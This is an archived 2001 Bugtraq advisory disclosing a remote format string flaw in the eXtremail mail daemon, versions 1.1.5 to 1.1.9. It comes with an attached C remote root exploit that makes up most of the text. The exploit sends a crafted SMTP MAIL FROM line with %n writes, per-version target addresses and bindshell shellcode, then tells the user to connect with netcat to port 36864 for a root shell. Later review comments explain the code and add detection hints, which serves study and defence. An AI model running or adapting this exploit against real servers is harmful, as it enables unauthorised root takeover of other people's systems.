

eXtremail Remote Format String ('s)

daemon@ATHENA.MIT.EDU (mu-b)
Fri Jun 22 13:21:04 2001

Message-ID: <004d01c0fb09$ce9ce4c0$8119fea9@neilk>
From: "mu-b" <mu-b@digit-labs.org>
To: <bugtraq@securityfocus.com>
Date: Fri, 22 Jun 2001 11:55:09 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_004A_01C0FB12.2F9941D0"

------=_NextPart_000_004A_01C0FB12.2F9941D0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Bugtraq readers,

eXtremail is a free, integrated POP3/SMTP mail daemon for Linux (x86); although
it is free, it is closed-source software. The majority of the newer versions have
been found to be vulnerable to a remotely exploitable format string condition.
The following versions are confirmed to be vulnerable to this condition:

    eXtremail v1.1.5
    eXtremail v1.1.6
    eXtremail v1.1.7
    eXtremail v1.1.8
    eXtremail v1.1.9

Note: version 1.1.3 is also presumed to be vulnerable, but that version was not
available for testing; I have strong reason to believe that it is.

The format string problem is located in the flog() function and is caused by
user-supplied data being used as the format string of an fprintf() statement. It
can be exploited remotely to obtain root privileges by sending appropriately
constructed strings as the arguments to the following commands:

Smtpd - HELO / EHLO / MAIL FROM:<....@....> / RCPT TO:<....@....>
Pop3 - USER (+ others requiring a suitable login).

This issue has been patched as of version 1.1.10; current or prospective users are
advised to upgrade to this version as soon as possible. It is obtainable from the
eXtremail homepage at http://www.extremail.com

Exploit code attached....

Yours sincerely.....
mu-b
___________________________________________________________

mu-b (µb)  (mu-b@digit-labs.org)
http://www.digit-labs.org

               "Like German Tourists, the stupid are everywhere"
                               -Arnold 'Judas' Rimmer - Red Dwarf BBC (c)


------=_NextPart_000_004A_01C0FB12.2F9941D0
Content-Type: application/octet-stream;
	name="extremail-exp.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="extremail-exp.c"

/* eXtremail-exp.c
 *
 * - eXtremail v1.1.5-9 Remote Root Exploit (x86) -
 *
 * - Tested on: RedHat 7.0 eXtremail v1.1.5
 *              RedHat 7.0 eXtremail v1.1.6
 *              RedHat 7.0 eXtremail v1.1.7
 *              RedHat 7.0 eXtremail v1.1.8
 *              RedHat 7.0 eXtremail v1.1.9
 *              NOT VULNERABLE eXtremail v1.1.10
 *
 * Copyright (c) 2001 by <mu-b@digit-labs.org>
 *
 * eXtremail v1.1.5+ has a format string problem
 * in flog(). This problem affects all user commands
 * (helo/ehlo/mail from:/rcpt to:), and is caused
 * by an improper fprintf() to the servers logfile.
 *
 * Buffers for helo/ehlo are too small (except v1.1.5),
 * therefore we use mail from: instead :).
 *
 * Note: Return Address's are quite tight due to the small
 *       buffers. Returning to the Heap is possible but
 *       is VERY unstable.
 *
 * Greets: mjm, all@alldas.de, teleh0r, grazer, cmds, gollum, #!digit-labs
 *
 * http://www.digit-labs.org/ -- Digit-Labs 2001!@$!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <resolv.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/stat.h>

/* NOTE(review): this listing is the quoted-printable body of the mail (see
 * the Content-Transfer-Encoding header of the attachment): "=3D" stands
 * for "=", "=20" for a trailing space, "=09" for a tab, and a bare "=" at
 * the end of a line is a soft line break joining it to the next line.
 * The text will not compile until it is decoded. */

/* Filler byte ('A') for the run that mkfmt() places before the shellcode. */
#define NOP		0x41
/* Highest valid index into targets[]; main() resets a larger type to 0. */
#define NUMVULN	4
/* Added to the table's return address in main(). */
#define OFFSET	0
/* TCP port opensocket() connects to (SMTP). */
#define PORT	25

void banner();
void mkfmt();
int opensocket(char *);
void usage();

/* Shared state set by main() and consumed by mkfmt(): the outgoing line,
 * its per-target length, the selected table row, the connected socket,
 * and the two addresses the crafted format string works with. */
char buf[520];
int buflength, type =3D 0, sock;
unsigned long target, retaddr;

/* Raw x86 Linux machine code from the named third party; treat the bytes
 * as opaque.  main() tells the user to connect to TCP 36864 afterwards, so
 * this presumably listens there.  It contains no 0x00 byte, which matters
 * because mkfmt() measures it with strlen(). */
unsigned char shellcode[]=3D /* lamagra bindshell code */
	"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
	"\x40\x89\xc3\x89\x46\x0c\x40\x89"
    	"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
    	"\x80\x43\xc6\x46\x10\x10\x88\x46"
    	"\x08\x31\xc0\x31\xd2\x89\x46\x18"
    	"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
    	"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
    	"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
    	"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
    	"\x56\x10\xb0\x66\x43\xcd\x80\x86"
    	"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
    	"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
    	"\x80\x88\x56\x07\x89\x76\x0c\x87"
    	"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
    	"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
    	"\x6e\x2f\x73\x68";

/*   target address's  -> objdump -R smtpd | grep "fflush"   */
/* One row per confirmed-vulnerable build.  target is the address the four
 * %n conversions built by mkfmt() write into (per the comment above, a
 * dynamic relocation entry of the smtpd binary); retaddr is the value they
 * assemble there; padding is the number of 'a' bytes main() appends after
 * "MAIL FROM:<"; buflength is the total size of the line sent.  The rows
 * differ only in the addresses and in buflength (the v1.1R5 buffer is
 * larger, as the header comment notes). */
struct {
	char *name;
	unsigned long target;
	unsigned long retaddr;
	int padding;
	int buflength;
} targets[] =3D {
        { "RedHat 7.0 eXtremail v1.1R5", 0x080864e0, 0xbf1ff64a, 1, =
500},
        { "RedHat 7.0 eXtremail v1.1R6", 0x08089d5c, 0xbf1ff5d6, 1, =
266},
        { "RedHat 7.0 eXtremail v1.1R7", 0x0808b3fc, 0xbf1ff5d6, 1, =
266},
        { "RedHat 7.0 eXtremail v1.1R8", 0x0808b6fc, 0xbf1ff5d6, 1, =
266},
        { "RedHat 7.0 eXtremail v1.1R9", 0x08088890, 0xbf1ff5d6, 1, =
266},
        { 0 } };

/* Write the tool's four banner lines to stderr, in order. */
void banner()
{
   static const char *const lines[] = {
      "\neXtremail V1.1R5-9 remote root exploit\n",
      "by: <mu-b@digit-labs.org>\n",
      "Copyright (c) 2001 Digit-Labs!@#$!\n",
      "http://www.digit-labs.org\n\n",
   };
   size_t k;

   /* The lines carry no conversions, so fputs() emits exactly what
    * fprintf() would. */
   for (k = 0; k < sizeof lines / sizeof lines[0]; k++)
      fputs(lines[k], stderr);
}

/* Finish and send the crafted MAIL FROM line.  main() has already seeded the
 * global buf with "MAIL FROM:<" and the target's padding; this appends:
 *   1. four 4-byte little-endian copies of `target`, each one higher than
 *      the last, i.e. the four consecutive bytes the %n conversions below
 *      will write to;
 *   2. a format string of four "%.<width>u%<k>$n" pairs, with widths chosen
 *      so that the server's running output count, modulo 256, equals the
 *      successive bytes of `retaddr` when each %n fires (the positional
 *      indices 38..41 are where those addresses sit on the vulnerable
 *      server's stack -- a property of the target build, not of this file);
 *   3. NOP filler, then the shellcode, a newline and a terminator, sized so
 *      the line is exactly `buflength` bytes.
 * Takes no arguments and returns nothing; reads type, target, retaddr,
 * buflength and sock from the globals and writes the line to sock.
 *
 * NOTE(review): for defenders, this is the shape to detect: an SMTP envelope
 * argument containing "%" conversions (especially "$n") followed by a long
 * run of one repeated byte.  The root cause it relies on -- client data
 * passed to fprintf() as the format -- is what the 1.1.10 fix removes. */
void mkfmt()
{
   int i, j =3D 0, num;
   int bytesofar;
   int fmtints[4];
   char *bufptr;
   unsigned char temp[4];

   /* Output bytes the vulnerable fprintf() has produced before the first %n
    * is reached; 35 presumably covers a fixed part of the log line -- TODO
    * confirm against the server. */
   bytesofar =3D 35 + targets[type].padding;
   bufptr =3D &buf[strlen(buf)];

   temp[0] =3D (unsigned char) (target & 0x000000ff);
   temp[1] =3D (unsigned char)((target & 0x0000ff00) >> 8);
   temp[2] =3D (unsigned char)((target & 0x00ff0000) >> 16);
   temp[3] =3D (unsigned char)((target & 0xff000000) >> 24);

   /* Emit target, target+1, target+2, target+3.  Only temp[0] is bumped,
    * so there is no carry into temp[1]; the table's low bytes stay below
    * 0xfd so that never matters here.  A 0x00 byte in any address would
    * also cut the string short for the later strlen(buf). */
   for(i =3D 0; i < 4; i++)
   {
      sprintf(bufptr, "%c%c%c%c", temp[0], temp[1], temp[2], temp[3]);
      bufptr +=3D 4;
      temp[0]++;
   }

   fmtints[0] =3D (int) (retaddr & 0x000000ff);
   fmtints[1] =3D (int)((retaddr & 0x0000ff00) >> 8);
   fmtints[2] =3D (int)((retaddr & 0x00ff0000) >> 16);
   fmtints[3] =3D (int)((retaddr & 0xff000000) >> 24);
  =20
   /* Turn each byte of retaddr into a field width: width = byte - count so
    * far, adding 0x100 until the width is at least 10 (presumably to keep
    * the emitted value's digit count predictable).  Because consecutive %n
    * targets overlap by one byte, only the low byte of each write needs to
    * be right.  The `num` flag makes the inner loop a do/while. */
   for(i =3D 0; i < 4; i++)
   {
      num =3D 0;

      if(fmtints[i] - bytesofar < 10)
      {
         while(num !=3D 1)
         {
            fmtints[i] =3D (fmtints[i] + 0x100);
            if(fmtints[i] - bytesofar > 9)
            {
               fmtints[i] -=3D bytesofar;
               bytesofar +=3D fmtints[i];
               num =3D 1;
            }
         }
      }
      else
      {
         fmtints[i] -=3D bytesofar;
         bytesofar +=3D fmtints[i];
      }
   }

   /* "%%" yields a literal '%' in the sent text; "%d" is the width. */
   sprintf(bufptr, "%%.%du%%38$n%%.%du%%39$n%%.%du%%40$n%%.%du%%41$n", =
fmtints[0], fmtints[1], fmtints[2], fmtints[3]);

   /* Pad up to where the shellcode must start.  The bound mixes int and
    * size_t (strlen), which is fine while it stays positive. */
   for(i =3D strlen(buf); i < buflength - strlen(shellcode) - 1; i++)
      buf[i] =3D NOP;

   /* `i = i` is a no-op: the index simply continues from the loop above. */
   for(i =3D i; i < buflength - 1; i++)
   {
      buf[i] =3D shellcode[j];
      j++;
   }

   /* buflength is at most 500, so buf[buflength] stays inside buf[520].
    * The write() result is not checked. */
   buf[buflength - 1] =3D '\n';
   buf[buflength] =3D '\0';
   write(sock, buf, strlen(buf));
}

/* Connect a TCP socket to `host` on PORT.  `host` may be a name (resolved
 * with gethostbyname()) or a dotted quad (parsed with inet_addr()).
 * Returns the connected descriptor, or -1 after reporting the failing call
 * with perror().
 *
 * NOTE(review): inet_addr() returns in_addr_t, which is unsigned, so the
 * "< 0" test below can never be true: an unparsable host falls through to
 * connect() with s_addr == INADDR_NONE instead of being rejected, and that
 * branch would also return without close(s).  getaddrinfo() is the current
 * replacement for both lookups. */
int opensocket(char *host)
{
   int s;
   struct sockaddr_in remote_sin;
   struct hostent *he;

   if((s =3D socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) =3D=3D -1) {
      perror("socket()");
      return -1;
   }

   memset((char *)&remote_sin, 0, sizeof(remote_sin));
   if((he =3D gethostbyname(host)) !=3D NULL)
      memcpy((char *)&remote_sin.sin_addr, he->h_addr, he->h_length);
   else if((remote_sin.sin_addr.s_addr =3D inet_addr(host)) < 0) {
         perror("gethostbyname()/inet_addr()");
         return -1;
   }

   /* PF_INET is used where AF_INET is meant; the values coincide. */
   remote_sin.sin_family =3D PF_INET;
   remote_sin.sin_port =3D htons(PORT);

   if(connect(s, (struct sockaddr *)&remote_sin, sizeof(remote_sin)) =
=3D=3D -1) {
      perror("connect()");
      close(s);
      return -1;
   }
	     =20
   return s;
}

/* Print the command-line synopsis and the numbered target table to stderr,
 * then terminate with status 0 (as the original does; a non-zero status
 * would be the usual choice for a usage error). */
void usage()
{
   int idx = 0;

   fputs("Usage: ./extremail <host> [type]\n", stderr);
   fputs("\nTargets:\n", stderr);

   /* The table is terminated by a row whose name is a null pointer. */
   while (targets[idx].name != NULL) {
      fprintf(stderr, "\t%d.\t%s\n", idx, targets[idx].name);
      idx++;
   }

   fputc('\n', stderr);
   exit(0);
}

/* Entry point: ./extremail <host> [type].  Selects a targets[] row, connects
 * to PORT on host, sends a HELO, has mkfmt() send the crafted MAIL FROM
 * line, closes the connection and tells the user which port to connect to.
 * Nothing is read back from the server, so a failure is not detected.
 *
 * NOTE(review): `type` is only checked against NUMVULN, so a negative
 * argv[2] indexes before targets[] (undefined behaviour); the "%p"
 * conversions are given unsigned long values ("%#lx" would match); and the
 * final `return;` in an int function leaves the exit status unspecified.
 * For an SMTP log, the session is just HELO, one MAIL FROM and a disconnect
 * with no RCPT or DATA. */
int main (int argc, char *argv[])
{
   char *host;
   int i;

   banner();

   if(argc < 2)
      usage();
 =20
   if(argc >=3D 3)
      type =3D atoi(argv[2]);

   if(type > NUMVULN)
      type =3D 0;
  =20
   host =3D argv[1];
   buflength =3D targets[type].buflength;
   target =3D targets[type].target;
   retaddr =3D targets[type].retaddr + OFFSET;

   fprintf(stderr, "Target:\t\t%s\nType:\t\t%s\n", host, =
targets[type].name);
   fprintf(stderr, "Target Address:\t%p\nReturn =
Address:\t%p\nOffset:\t\t%d\n", target, retaddr, OFFSET);
   fprintf(stderr, "Buflength:\t%d\n", buflength);  =20

   /* Descriptor 0 is treated as a failure here; harmless in practice. */
   if ((sock =3D opensocket(host)) <=3D 0)
      return -1;

   fprintf(stderr, "\nConnected....\n");

   /* 11 bytes, no terminator: relies on buf being a zero-initialised
    * global so that strlen(buf) below is well defined. */
   memcpy(buf, "MAIL FROM:<", 11);
  =20
   for(i =3D 0; i < targets[type].padding; i++)
      buf[strlen(buf)] =3D 0x61;

   /* The literal is 25 characters; the count of 26 also sends its NUL. */
   sleep(1);
   write(sock, "HELO digit-labs.org!@#$!\n", 26);

   sleep(1);
   mkfmt();

   sleep(1);
   close(sock);

   fprintf(stderr, "\n[1] sent payload....\n");
   fprintf(stderr, "[2] waiting....\n");
   sleep(2);
   fprintf(stderr, "[3] nc %s 36864 for shell....\n\n", host);

   return;
}

------=_NextPart_000_004A_01C0FB12.2F9941D0--

